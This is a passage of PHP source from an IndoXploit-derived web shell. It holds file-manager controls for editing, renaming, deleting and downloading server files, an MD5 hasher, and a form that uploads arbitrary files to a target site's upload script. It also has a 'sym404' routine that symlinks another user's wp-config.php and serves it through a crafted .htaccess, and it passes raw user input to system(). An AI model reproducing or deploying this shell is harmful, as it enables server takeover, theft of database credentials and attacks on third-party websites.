1957. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1958. echo "</tr>";
1959. }
1960. echo "</table>";
1961. if(!is_readable($dir)) {
1962. //
1963. } else {
1964. echo "<hr>";
1965. }
1966. echo "<center>Copyright - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>&copy; IndoXploit</font></a></center>";
1967. echo "<center>Recoded &copy; ".date("Y")." - <a href='http://www.official-0xcor3.ga/' target='_blank'><font color=yellow>0xCor3</font></a></center>";
1968. }
1969. if($_GET['do'] == 'hash_en') {
1970. echo '<center>
1971. <p></rp>
1972. <h3><font color=blue>Md5 Encrypter</font></h3>
1973. <form action="" method="post">
1974. Text : <input type="text" name="text" />
1975. <input type="submit" name="md5" value="Create!" />
1976. </form></center>';
1977. error_reporting(0);
1978. $text = $_POST['text'];
1979. $hash = md5($text);
1980. $md5 = $_POST['md5'];
1981. if(isset($md5))
1982. {
1983. echo "<center><font color=yellow>MD5 Hash :</font></center>";
1984. echo '<center>';
1985. echo $hash;
1986. echo '</center>';
1987. }
1988. }
1989. elseif($_GET['do'] == 'csrf') {
1990. echo '<center><form method="post">
1991. URL Web Target : <input type="text" name="url" size="50" height="10" placeholder="http://www.target.co.li/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
1992. Type Name: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / file_field / dan lain lain" style="margin: 5px auto; padding-left: 5px;" required><br>
1993. <input type="submit" name="d" value="Lock Target!">
1994. </form></center></td> </tr>';
1995. $url = $_POST['url'];
1996. $pf = $_POST['pf'];
1997. $d = $_POST['d'];
1998. if($d) {
1999. echo "<center><form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Explo17!'></form></center>";
2000. }; }
2001. elseif($_GET['do'] == 'sym404') {
2002. echo '<center><form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
2003. <br>Save As: <input name="jnck" value="sym404.txt"><input name="ojaykan" type="submit" value="GasPol!"></form></center>';
2004. if($_POST['ojaykan']){
2005. rmdir("sym404");mkdir("sym404", 0777);
2006. $dir = $_POST['dir'];
2007. $jnck = $_POST['jnck'];
2008. system("ln -s ".$dir." sym404/".$jnck);
2009. symlink($dir,"sym404/".$jnck);
2010. $inija = fopen("sym404/.htaccess", "w");
2011. fwrite($inija,"ReadmeName ".$jnck);
2012. echo'<center><a href="sym404/">Klik Gan >:(</a></center>';
2013. }
2014. }
2015. ?>
2016. </html>